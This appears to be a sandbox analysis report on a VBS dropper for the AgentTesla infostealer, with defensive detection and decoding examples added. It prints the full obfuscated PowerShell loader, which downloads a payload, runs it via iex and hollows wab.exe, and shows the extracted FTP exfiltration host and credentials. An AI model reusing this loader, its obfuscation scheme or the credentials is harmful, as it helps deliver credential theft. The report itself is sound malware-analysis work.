Analysis
-
max time kernel: 147s
max time network: 145s
platform: windows7_x64
resource: win7-20240215-en
resource tags: arch:x64, arch:x86, image:win7-20240215-en, locale:en-us, os:windows7-x64, system
submitted: 27-04-2024 01:31
Static task: static1
Behavioral task: behavioral1
  Sample: 94ffc7bec0cef06550d739bc5014a3232c9218a50524de0464b53b6dbbd7ed5f.vbs
  Resource: win7-20240215-en
Behavioral task: behavioral2
  Sample: 94ffc7bec0cef06550d739bc5014a3232c9218a50524de0464b53b6dbbd7ed5f.vbs
  Resource: win10v2004-20240426-en
General
-
Target: 94ffc7bec0cef06550d739bc5014a3232c9218a50524de0464b53b6dbbd7ed5f.vbs
Size: 59KB
MD5: 3c00879a0e4e4a7d7b78bb8611bcc94f
SHA1: 3ddd2f54b7fb54df60134318515fd61b119bc46f
SHA256: 94ffc7bec0cef06550d739bc5014a3232c9218a50524de0464b53b6dbbd7ed5f
SHA512: 4dfce826cf9f7456dd981b4a1b4c985d75c9c849434a94c5987bd08fe037217b5160441e23072c498b5e9c93e2d00d8c6e814ea1736e68724aa461881ab1b31c
SSDEEP: 1536:cdukLI1gPDPTxyk0MfFCNqnlAEfen8TCQr:Yukk1gPDJzoGaEWn8Tv
Malware Config
Extracted: agenttesla
Protocol: ftp
Host: ftp://ftp.concaribe.com
Port: 21
Username: [email protected]
Password: 2ogFj^8ECV(?
Signatures
-
AgentTesla
Agent Tesla is a .NET-based information stealer and remote access tool (RAT); the extracted configuration above shows this build is set up to exfiltrate over FTP.
-
All six YARA hits below fire on the same two memory regions of wab.exe (PID 2768), i.e. on the unpacked payload injected into that process, not on the VBS or the PowerShell stage.
-
Detect packed .NET executables. Mostly AgentTeslaV4. (2 IoCs)
Processes (resource / yara_rule):
  behavioral1/memory/2768-30-0x0000000000A90000-0x0000000001AF2000-memory.dmp / INDICATOR_EXE_Packed_GEN01
  behavioral1/memory/2768-31-0x0000000000A90000-0x0000000000AD2000-memory.dmp / INDICATOR_EXE_Packed_GEN01
-
Detects binaries (Windows and macOS) referencing many web browsers. Observed in information stealers. (2 IoCs)
Processes (resource / yara_rule):
  behavioral1/memory/2768-30-0x0000000000A90000-0x0000000001AF2000-memory.dmp / INDICATOR_SUSPICIOUS_Binary_References_Browsers
  behavioral1/memory/2768-31-0x0000000000A90000-0x0000000000AD2000-memory.dmp / INDICATOR_SUSPICIOUS_Binary_References_Browsers
-
Detects executables referencing Windows vault credential objects. Observed in infostealers. (2 IoCs)
Processes (resource / yara_rule):
  behavioral1/memory/2768-30-0x0000000000A90000-0x0000000001AF2000-memory.dmp / INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID
  behavioral1/memory/2768-31-0x0000000000A90000-0x0000000000AD2000-memory.dmp / INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID
-
Detects executables referencing many confidential data stores found in browsers, mail clients, cryptocurrency wallets, etc. Observed in information stealers. (2 IoCs)
Processes (resource / yara_rule):
  behavioral1/memory/2768-30-0x0000000000A90000-0x0000000001AF2000-memory.dmp / INDICATOR_SUSPICIOUS_EXE_References_Confidential_Data_Store
  behavioral1/memory/2768-31-0x0000000000A90000-0x0000000000AD2000-memory.dmp / INDICATOR_SUSPICIOUS_EXE_References_Confidential_Data_Store
-
Detects executables referencing many email and collaboration clients. Observed in information stealers. (2 IoCs)
Processes (resource / yara_rule):
  behavioral1/memory/2768-30-0x0000000000A90000-0x0000000001AF2000-memory.dmp / INDICATOR_SUSPICIOUS_EXE_References_Messaging_Clients
  behavioral1/memory/2768-31-0x0000000000A90000-0x0000000000AD2000-memory.dmp / INDICATOR_SUSPICIOUS_EXE_References_Messaging_Clients
-
Detects executables referencing many file transfer clients. Observed in information stealers. (2 IoCs)
Processes (resource / yara_rule; the rule name carries its upstream misspelling):
  behavioral1/memory/2768-30-0x0000000000A90000-0x0000000001AF2000-memory.dmp / INDICATOR_SUSPICIOUS_EXE_Referenfces_File_Transfer_Clients
  behavioral1/memory/2768-31-0x0000000000A90000-0x0000000000AD2000-memory.dmp / INDICATOR_SUSPICIOUS_EXE_Referenfces_File_Transfer_Clients
-
Blocklisted process makes network request (2 IoCs)
Processes (flow / pid / process):
  2 / 2328 / WScript.exe
  8 / 2788 / powershell.exe
-
Looks up external IP address via web service (2 IoCs)
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes (flow / ioc):
  11 / api.ipify.org
  12 / api.ipify.org
-
Suspicious use of NtCreateThreadExHideFromDebugger (1 IoC)
Processes (pid / process):
  2768 / wab.exe
-
Suspicious use of NtSetInformationThreadHideFromDebugger (2 IoCs)
Processes (pid / process):
  304 / powershell.exe
  2768 / wab.exe
-
Suspicious use of SetThreadContext (1 IoC)
Processes (description / pid / process / target process):
  PID 304 set thread context of 2768 / 304 / powershell.exe / wab.exe
-
Runs ping.exe (1 TTP, 2 IoCs)
Processes: the two ping.exe children of WScript.exe in the process tree below.
-
Suspicious behavior: EnumeratesProcesses (5 IoCs)
Processes (pid / process, number of events):
  2788 / powershell.exe (1)
  304 / powershell.exe (2)
  2768 / wab.exe (2)
-
Suspicious behavior: MapViewOfSection (1 IoC)
Processes (pid / process):
  304 / powershell.exe
-
Suspicious use of AdjustPrivilegeToken (3 IoCs)
Processes (description / pid / process):
  Token: SeDebugPrivilege / 2788 / powershell.exe
  Token: SeDebugPrivilege / 304 / powershell.exe
  Token: SeDebugPrivilege / 2768 / wab.exe
-
Suspicious use of WriteProcessMemory (29 IoCs)
Processes (source pid / source process -> target pid / target process, number of events):
  2328 / WScript.exe -> 2572 / ping.exe (3)
  2328 / WScript.exe -> 2724 / ping.exe (3)
  2328 / WScript.exe -> 2756 / cmd.exe (3)
  2328 / WScript.exe -> 2788 / powershell.exe (3)
  2788 / powershell.exe -> 2480 / cmd.exe (3)
  2788 / powershell.exe -> 304 / powershell.exe (4)
  304 / powershell.exe -> 2828 / cmd.exe (4)
  304 / powershell.exe -> 2768 / wab.exe (6)
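The behaviours tabulated above (script host spawning PowerShell, PowerShell writing into a freshly created wab.exe and then calling SetThreadContext on it) are the pattern a hunter would look for in endpoint telemetry. The following is an added example written for this page, not part of the sandbox report: it rebuilds the process tree from constructed process-creation records (the PIDs and image paths are the report's own; the Sysmon-like record shape and the placeholder parent PID 1000 for WScript.exe are assumptions) and flags the hollowing chain.

```python
"""Added example (not part of the sandbox report): checking the process
chain and SetThreadContext finding from the signatures above against
endpoint-style telemetry."""
import ntpath
from typing import Dict, List, Tuple

# Constructed (pid, ppid, image) process-creation records, mirroring the
# report's process tree and WriteProcessMemory table. ppid 1000 is an
# assumed stand-in for the unknown parent of the script host.
PROC_EVENTS: List[Tuple[int, int, str]] = [
    (2328, 1000, r"C:\Windows\System32\WScript.exe"),
    (2572, 2328, r"C:\Windows\System32\ping.exe"),
    (2724, 2328, r"C:\Windows\System32\ping.exe"),
    (2756, 2328, r"C:\Windows\system32\cmd.exe"),
    (2788, 2328, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"),
    (2480, 2788, r"C:\Windows\system32\cmd.exe"),
    (304, 2788, r"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe"),
    (2828, 304, r"C:\Windows\SysWOW64\cmd.exe"),
    (2768, 304, r"C:\Program Files (x86)\windows mail\wab.exe"),
]

# Constructed (source pid, target pid) "set thread context" records, from
# the "Suspicious use of SetThreadContext" signature above.
THREAD_CTX_EVENTS: List[Tuple[int, int]] = [(304, 2768)]

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe"}
SHELLS = {"powershell.exe", "pwsh.exe"}


def build_tree(events: List[Tuple[int, int, str]]):
    """Map each pid to its parent pid and to its lower-cased image basename."""
    parent: Dict[int, int] = {}
    image: Dict[int, str] = {}
    for pid, ppid, img in events:
        parent[pid] = ppid
        image[pid] = ntpath.basename(img).lower()  # ntpath handles backslashes on any OS
    return parent, image


def ancestry(pid: int, parent: Dict[int, int], image: Dict[int, str]) -> List[str]:
    """Image names from the oldest known ancestor down to pid."""
    chain: List[str] = []
    seen = set()
    while pid in image and pid not in seen:
        seen.add(pid)
        chain.append(image[pid])
        pid = parent[pid]
    return list(reversed(chain))


def script_host_spawns_shell(events: List[Tuple[int, int, str]]) -> List[int]:
    """PIDs of PowerShell processes whose direct parent is a script host."""
    parent, image = build_tree(events)
    return sorted(pid for pid in image
                  if image[pid] in SHELLS and image.get(parent.get(pid)) in SCRIPT_HOSTS)


def hollowed_children(events: List[Tuple[int, int, str]],
                      ctx_events: List[Tuple[int, int]]) -> List[dict]:
    """Children whose thread context was rewritten by their own PowerShell parent.

    A parent that creates a child, writes into it, and then calls
    SetThreadContext on it is the classic process-hollowing sequence; the
    report shows exactly that from PID 304 into wab.exe (PID 2768).
    """
    parent, image = build_tree(events)
    findings = []
    for src, tgt in ctx_events:
        if parent.get(tgt) != src or image.get(src) not in SHELLS:
            continue
        chain = ancestry(tgt, parent, image)
        findings.append({
            "target_pid": tgt,
            "target_image": image[tgt],
            "chain": chain,
            "script_host_ancestor": any(name in SCRIPT_HOSTS for name in chain),
        })
    return findings


if __name__ == "__main__":
    print("script host -> PowerShell:", script_host_spawns_shell(PROC_EVENTS))
    for finding in hollowed_children(PROC_EVENTS, THREAD_CTX_EVENTS):
        print("hollowed:", finding)
```

The SetThreadContext check is deliberately tied to the parent/child relationship: a parent rewriting the main thread context of a child it just created (rather than an arbitrary remote process) is what distinguishes hollowing from a debugger or profiler attaching to an existing process.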
Processes
-
C:\Windows\System32\WScript.exe (PID 2328, depth 1)
Command line: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\94ffc7bec0cef06550d739bc5014a3232c9218a50524de0464b53b6dbbd7ed5f.vbs"
- Blocklisted process makes network request
- Suspicious use of WriteProcessMemory
-
  C:\Windows\System32\ping.exe (depth 2)
  Command line: ping google.com -n 1
  - Runs ping.exe
-
  C:\Windows\System32\ping.exe (depth 2)
  Command line: ping %.%.%.%
  - Runs ping.exe
-
  C:\Windows\system32\cmd.exe (PID 2756, depth 2)
  Command line: C:\Windows\system32\cmd.exe /c dir
-
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 2788, depth 2)
  Command line (obfuscated script captured verbatim; the line breaks below are from the export):
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Dragonwort = 1;$Vad='Substrin';$Vad+='g';Function Forfatterskaberne($Honnren){$Naeppe=$Honnren.Length-$Dragonwort;For($Tyndhudet=5; $Tyndhudet -lt $Naeppe; $Tyndhudet+=(6)){$Anticipants+=$Honnren.$Vad.Invoke($Tyndhudet, $Dragonwort);}$Anticipants;}function Flelsessagers167($baitfish){. ($Statsls) ($baitfish);}$Noncritical84=Forfatterskaberne 'Ni.roM D mmoGaasezBrandi N.dklFrokolMercaaSiv.n/Ensw.5Glaci. Berm0Nring Teate(ArntpWKnickiDkninnPlessdDeducoRepetwmahonsC vil KilowNP omoT,adly Sejse1Forlg0Klond.Menya0Paata;Cosse SorteW C.rei,urkin sade6P,tel4Stoni;Bysba Lettex C no6 Folk4Adhak;Fis,i weedrAabenv Voks:Capan1Res z2Nonpo1 Wird.Dront0Hasse) Inte VauntGStikle.evercVemodkErhveoNeogr/Praef2Forep0A dem1Val,i0 Held0Takt.1Nontr0R,gne1slbsa ParagFJenviiClearrRigore rullfCircuoLid oxSymme/ Band1Amfib2sho p1Minds.L.est0Tude. ';$Systemgrafs=Forfatterskaberne 'ErnriU D scs KunseA tiqrPolit-tjavsA SpndgtaxieeS.bvenArabet Dece ';$Bewhite=Forfatterskaberne 'EndanhWadmat Illat annap Gyre:Delig/ Unfl/B mbanElbiliRateft in eiDtrenoArkol. 
.nurcord.noRestamShoeb/ K,erk Supe2Komma/BregoUHandenWaterc ForwoPoindnshrafsPancrc.iffsiBrydne Convn.utsutPulloiJomfroUningu LodgsToolmn.etaleSpilfsVittus Gunv.Conc.jSamvrp.nddkbEndoc ';$Foelsomhed=Forfatterskaberne 'Extra>Alkoh ';$Statsls=Forfatterskaberne 'Re,nui KandeHust.x.indu ';$Soil='Bureaucratizes';Flelsessagers167 (Forfatterskaberne 'SuperSThroue Bl atEneka-Unde.CSavtaoBibl.n UbiqtRedekeEnkeln ucert Lime Has,e-forbuPkludra AdvotminimhSpl.t Mu.tiTNvnin:Kan.n\ ommeAIdeoln Pewet.jlleiAbdietNedkuyDorsipBeclio PissuBrystsImmob.MelletAlactxB nzetOverp Misfo- CincV lupuaUltralTre.muNum.eeUnive Ign,t$ uskuSmelano gleri UndelSume.; Na,u ');Flelsessagers167 (Forfatterskaberne 'MetafiMaskif Sheo Smaa(GerbrtRaneeeAcquisNitritD.mme-DivispstewaaShooptAmt fhButtl BoxinTBioxa: Gr n\futurAEthionKorrotLdervi LengtStor,y,arvepSyneroSmrreuKiwifsWebbe.Papagtendowxmisfot Citr)Hoved{ RedseDextrxtrachiTrochtDrnle}.ctor;Benda ');$Plumipede107 = Forfatterskaberne ' OmsteSqsamcTone.hLodlioProli Hvnen%snksmaUnexapDumstpRigsmdCo ntaRenipt FrigaHanke% Smil\ B.rdVKa.meeSe sur Uhe.eBranddHippoiMbirac Bildt.eget.Unprem RegiocoleouTroll S gte&Afkry&Magia F.odeNatioc N.nphPulpioPreco ulli$ Deod ';Flelsessagers167 (Forfatterskaberne 'Coe o$Inchag AsaflTriumoTrettbUngraa urfl Alun:ThaniHTab reskar,arosarrSpaentGeot.gKontrr Vrt i DyrseStoddfFakul=Dagge( Te,ecJaspimSkat,dBeeth Udst./Pr.srcOverh Dees$ OpspPAf.ikl FireuArsenmVksthinukesp Dexte DebwdAntere,rocn1Fortn0Print7Stila) .nds ');Flelsessagers167 (Forfatterskaberne ' U kr$ Vagtg TalllMagniodis.ebStockaRet.rlPseud: arisJBarder,eskfeShan nMand,= lanc$SwowmB St feUnderwBl myhmarduiT.avstCharyeCatar.KontasVildfpNaganl ggesiAle.atIndsn(No eq$PrebeFUmiacoDyk,eekonfolBlacksNordvoKolormDiscohScolee Linnd Fabr)Semig ');$Bewhite=$Jren[0];Flelsessagers167 (Forfatterskaberne 'Lokal$StrmfgUsurplWay,ioForhab mdiraHovedlOverd:Pa,peRTrakkeEr,antSubhes KampsMatchi CohokMumpikSkibseR.tirrInforhNonfeeBarled Recoe.rescnBe oos Un,e=FunicN 
SknneAllydwCushb-HaandONomeub ToiljV dneeJokercPorthtAphon enthrSRadixySuttes,nsubtTerateEuropmL,ndl.AutenN .rubeLamedt,etfi.Lap.aW Fr teSvmmebNedsvC DelilOm leiAcclieMareknInkast,nter ');Flelsessagers167 (Forfatterskaberne 'Bu im$TraveRBarfoe HodotImpacsO,isssTrbesidrikkk .nenkLondieE,terrFr,mbhOptraeStududK yose Da.anSm rosHete..JobsgHBaggreUnperaReinad Laere SerorDybfrswe,tb[Sprud$CoregSBri,hy,odessKnkketTryl e Cheem Phy,gLok.er ,lluaintegfTradis Alge]Unde,=Epina$UnsepNla ceoSum.onReveicMilierF.uori ommtKalifiVibr c U ifa UdpelChor.8 Eksp4Musel ');$Bakteriologierne=Forfatterskaberne 'IodhyRTrnereschn tBoucls tebastol,mi Retsku.remk PseueDialyrPo,olhLar.seCre.edStorteLim enRu,anssplit.udsmuDwarpooParn,wInsatnTjrehlCruseoOutraaNidi,dByforFHunkniUsy,llDom,meStoma(Forst$GenfoBPirojeOverrwAktivhTrindi Al.rtBllere Trou,Pupp,$ WeinsKin su QuidbE,cinjUnr.me Ag icCal ptSy thiBoo.hoAv,can efisBla,t)Unaus ';$Bakteriologierne=$Heartgrief[1]+$Bakteriologierne;$subjections=$Heartgrief[0];Flelsessagers167 (Forfatterskaberne ' Unva$Clam,gnormklGataao DekobdrninaInsiplPlect:Stym EAdfrdl VaresIchthaDrnfa= klub( Mil T Ci,ieTabansIndh,tSmuds-BrudnPGangwaStubmtGimpihDystr Comp$TelessSydgau Tranb,hospjLev.veManufc SqustVasociElecto ravenBregnsD,kke)Arbej ');while (!$Elsa) {Flelsessagers167 (Forfatterskaberne 'Si us$LyssigPulerlKlupuoVexi.bAntheaCyanolR fle:MargeN PhotoBehann .recbPowdeaTud,ksExceriEft,rnMarcigDatak3Trold5Rette=Brevf$ParoctknuserAmat,uConsteT ivi ') ;Flelsessagers167 $Bakteriologierne;Flelsessagers167 (Forfatterskaberne 'FatniS.yroatMargeao.thorSkoletDegre-stockSHu.knlShamee PotaeLsepepHo ed A,tst4Ta.ov ');Flelsessagers167 (Forfatterskaberne 'Hyb i$Denigg PerclForsvoRec,obUnodoa Dr mlReobl:malleE,ntihlS.rsosRutefaCarfa=nytes(FuldfTPhotoeEug,esR,kistAnr.t- DetrP,recoaOdon t GavshCo,ed Egmu $GormasRigs.uTilrabaglosj ArbeeStde.cBiogetKalkuiGilbeoLegemnDi,gosfusio)walis ') ;Flelsessagers167 (Forfatterskaberne ' iffe$ T.nngVkkeul Fibeo NaevbGaincaSy,telfesta:OverbF 
Pip,oValgfrmontelKultiyThysag StiltKnipleSprosrenga.n Tr meDelussHde s= Ence$DemisgR caglFarseoPartrbEthe.aBeaanldross:SurveVSp jdieditetTeddceRosvrlPolarlHyperaZuniarOv rci Di.tuPedotmTrumf8Bra.n9 Fert+Homil+Boate%Uter.$Hy erJFall,rBo,gie BrownWood .NonercVergeoParasuSeas nDubiotnedga ') ;$Bewhite=$Jren[$Forlygternes];}Flelsessagers167 (Forfatterskaberne ' Ra.e$Adolfg DruplVid oo jamabOplsfa,wvenl Naug:roofyfS,ercj WidieAn.jalTattidKol.i Hj.mm= Hair UnicoG Smaae tasstDr.ft-cren.CPartioAreeln WaxwtNona.eSammen.nwratEm,ti Tusch$TamelsS,rikuAtt nbPodsojHeathekommacAccentMisapi OphaoGenglnDruses irke ');Flelsessagers167 (Forfatterskaberne 'Kardi$BarspgFactol HypooF,skebWim,laAwr slKarlj:UnperI OptrmCosmomdukavaBizartNotearAfsigiLnpotk,aleauoppakl.lufseForurr ArnaiProrinProstgForbeeBedrerExter Dekon=.nnih Luzul[MotorSC.rsty,ments ProttM,kroe R stmlokal.ScythCBascioRibbenGengivEks,le .istr PrmitUnrec]Rubbi: pern:Ank.rFSolhar AcicoAndelmS,parBCremea TownsProceeLi,en6Undli4SlagsSPantstFd elrUnhomi.ectan ,enigAer n(primr$ KejsfByggrjHu oreProcolProjedUtopi)C ffe ');Flelsessagers167 (Forfatterskaberne 'Empye$,onpegGaunclQui,do AcarbKnip,aVoliplSejoi:HomunRConsueR sprcCam hoAu.itnResurtIdkoreStranmFerripAdrielunfraaLabeltUnd,riForgroForbrnMonop Flo,e= prea Subpe[CancrS UkrnyTithasHexamt iodee ForpmVselm.PinewTPondeeStagnxBreittFi,mo.KoppeEBromfnVve,ecExpenoBr,stdHushoiRapson Progg Regi]Supe.: Kolo:SeverAOilmoSMisi CV.locIs,iseIKn ge.PusseGPupate efeat SeklSSystet,peakrClituiIndren Ins.gPercu( Fors$SelvmI.entrm,arvemPolaraM.ndst,forgr Ajugi CacokKatodu Narrl RowleImperrUrpreiStagin Mod gBarnae yriarVrdig)Pimpl ');Flelsessagers167 (Forfatterskaberne 'Empir$Id,lsgMiljalBes.loVed.abPedi.a PaaflFrimu:AlecttGldspoUpstrnPrl,daZoogerNon,ut .ffie DistrStu,in ReareKmmen=,allo$NringRLaidle U.frc B fro oelnHypnotOmkrae R.hamKybelpCr.stlBlawnarepubtLingui ovioS,ijonF.yve. 
IdrisStemnuMora,bPallasfaithtWeekerPree,iSansenDilatg Form( Grns3Klink0Tyrek1.rveg7.rede8 Emul5.atto,ins e2Slupp8.avvr7 mbit4 K.nt7 cypr)Ov,rs ');Flelsessagers167 $tonarterne;"
  - Blocklisted process makes network request
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
-
    C:\Windows\system32\cmd.exe (PID 2480, depth 3)
    Command line: "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Veredict.mou && echo $"
-
    C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe (PID 304, depth 3)
    Command line: "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Dragonwort = 1;$Vad='Substrin';$Vad+='g';Function Forfatterskaberne($Honnren){...}" (the script argument is identical to the parent powershell.exe's above; the 64-bit instance re-runs the same script under the 32-bit SysWOW64 host)
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: MapViewOfSection
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
-
      C:\Windows\SysWOW64\cmd.exe (PID 2828, depth 4)
      Command line: "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Veredict.mou && echo $"
-
      C:\Program Files (x86)\windows mail\wab.exe (PID 2768, depth 4)
      Command line: "C:\Program Files (x86)\windows mail\wab.exe"
      - Suspicious use of NtCreateThreadExHideFromDebugger
      - Suspicious use of NtSetInformationThreadHideFromDebugger
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
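Every string in the PowerShell stage above is passed through Forfatterskaberne, which keeps one character out of every six (offset 5 of each 6-character chunk; the rest is filler made of Danish word fragments) and feeds the result to Flelsessagers167, i.e. `. iex <string>`. The following is an added example written for this page, not code from the sample or the sandbox: it ports that decoder to Python and runs it over four strings copied verbatim from the command line above. Only strings that do not cross an export line break are used, because collapsed whitespace there would shift the stride and garble the output. The obfuscate() helper is a constructed inverse for round-trip testing, not the actor's generator.

```python
"""Added example (written for this page, not code from the sample or the
sandbox): Python port of the PowerShell stage's string decoder, applied to
strings copied from the captured command line."""
import random
import string

# The sample's decoder, in PowerShell, is:
#   $Naeppe = $Honnren.Length - 1
#   For ($i = 5; $i -lt $Naeppe; $i += 6) { $out += $Honnren.Substring($i, 1) }
# i.e. the plaintext is one character per 6-character chunk, at offset 5.
# Because the loop bound is Length-1 with -lt, the last chunk never
# contributes; it is pure padding.


def forfatterskaberne(honnren: str) -> str:
    """Every 6th character starting at index 5, stopping before len-1."""
    return "".join(honnren[i] for i in range(5, len(honnren) - 1, 6))


# Encoded strings copied verbatim from the powershell.exe command line in
# the process tree above (variable names are the script's own).
SYSTEMGRAFS = "ErnriU D scs KunseA tiqrPolit-tjavsA SpndgtaxieeS.bvenArabet Dece "
STATSLS = "Re,nui KandeHust.x.indu "
FOELSOMHED = "Extra>Alkoh "
FIRST_STATEMENT = r"SuperSThroue Bl atEneka-Unde.CSavtaoBibl.n UbiqtRedekeEnkeln ucert Lime Has,e-forbuPkludra AdvotminimhSpl.t Mu.tiTNvnin:Kan.n\ ommeAIdeoln Pewet.jlleiAbdietNedkuyDorsipBeclio PissuBrystsImmob.MelletAlactxB nzetOverp Misfo- CincV lupuaUltralTre.muNum.eeUnive Ign,t$ uskuSmelano gleri UndelSume.; Na,u "


def decode_known_strings() -> dict:
    """Decode the captured strings; keys are the script's variable names."""
    return {
        "Systemgrafs": forfatterskaberne(SYSTEMGRAFS),
        "Statsls": forfatterskaberne(STATSLS),
        "Foelsomhed": forfatterskaberne(FOELSOMHED),
        "first Flelsessagers167 argument": forfatterskaberne(FIRST_STATEMENT),
    }


def obfuscate(plain: str, seed: int = 0) -> str:
    """Constructed inverse of the decoder (an assumption, not the actor's tool).

    Each plaintext character is preceded by five filler characters, and a
    trailing 6-character junk chunk is appended so that the decoder's
    Length-1 bound still reaches the last real character.
    """
    rng = random.Random(seed)
    alphabet = string.ascii_letters + " .,"
    chunks = ["".join(rng.choice(alphabet) for _ in range(5)) + ch for ch in plain]
    chunks.append("".join(rng.choice(alphabet) for _ in range(6)))
    return "".join(chunks)


if __name__ == "__main__":
    for name, value in decode_known_strings().items():
        print(f"{name}: {value!r}")
    print(forfatterskaberne(obfuscate("Invoke-WebRequest")))
```

Running it gives `User-Agent`, `iex` and `>` for the three short strings, and `Set-Content -Path T:\Antitypous.txt -Value $Soil;` for the first statement the script executes (with `$Soil = 'Bureaucratizes'` set in clear text just before it). With `$Statsls` decoding to `iex`, every `Flelsessagers167 (...)` call in the command line is an Invoke-Expression of the decoded fragment, so the same port can be applied to any other chunk of the script whose whitespace survived intact.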
Network
MITRE ATT&CK Matrix ATT&CK v13
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\0YC7I603DGQVOI0QIBSA.temp
Filesize: 7KB
MD5: d6990a2ece84f10c60d8380e4bdd0343
SHA1: 2fcd81a302d88cc2df1e6d2ebe5f30812bc320cf
SHA256: 9013014be269e5cce493b501892b621356fe0fa7890feeb031ed5839b6b0d9d9
SHA512: 991fc474d330cd6e450777b13a785acf587b56b9103974c38d86aa29942416bacca4dc33265ceaf6de59a041a0f0bce8a5b2320190e9361c09257b8c06960ede
-
C:\Users\Admin\AppData\Roaming\Veredict.mou
Filesize: 430KB
MD5: 446bd53386a67b6e402c67f8077b3a9e
SHA1: 11d006e1c77dddfff4559bef35ec15bd01fb8cbc
SHA256: 85f74a4e42fd58c712bfce653b8eb1d71c57793e22daf9529c7c916c4660dfc4
SHA512: 1afae58e5cbedc6c2aaa7779bb9217f1cf00aff240a9bdbdc41394a30cc1bd59181a83c8fd62fb636d34b0be41cb8a277c64c9126d52881324cbcff27753e838
-
memory/304-28-0x00000000064E0000-0x000000000A80F000-memory.dmp
Filesize: 67.2MB
-
memory/2768-30-0x0000000000A90000-0x0000000001AF2000-memory.dmp
Filesize: 16.4MB
-
memory/2768-31-0x0000000000A90000-0x0000000000AD2000-memory.dmp
Filesize: 264KB
-
memory/2788-22-0x0000000001D20000-0x0000000001D28000-memory.dmp
Filesize: 32KB
-
memory/2788-21-0x000000001B7D0000-0x000000001BAB2000-memory.dmp
Filesize: 2.9MB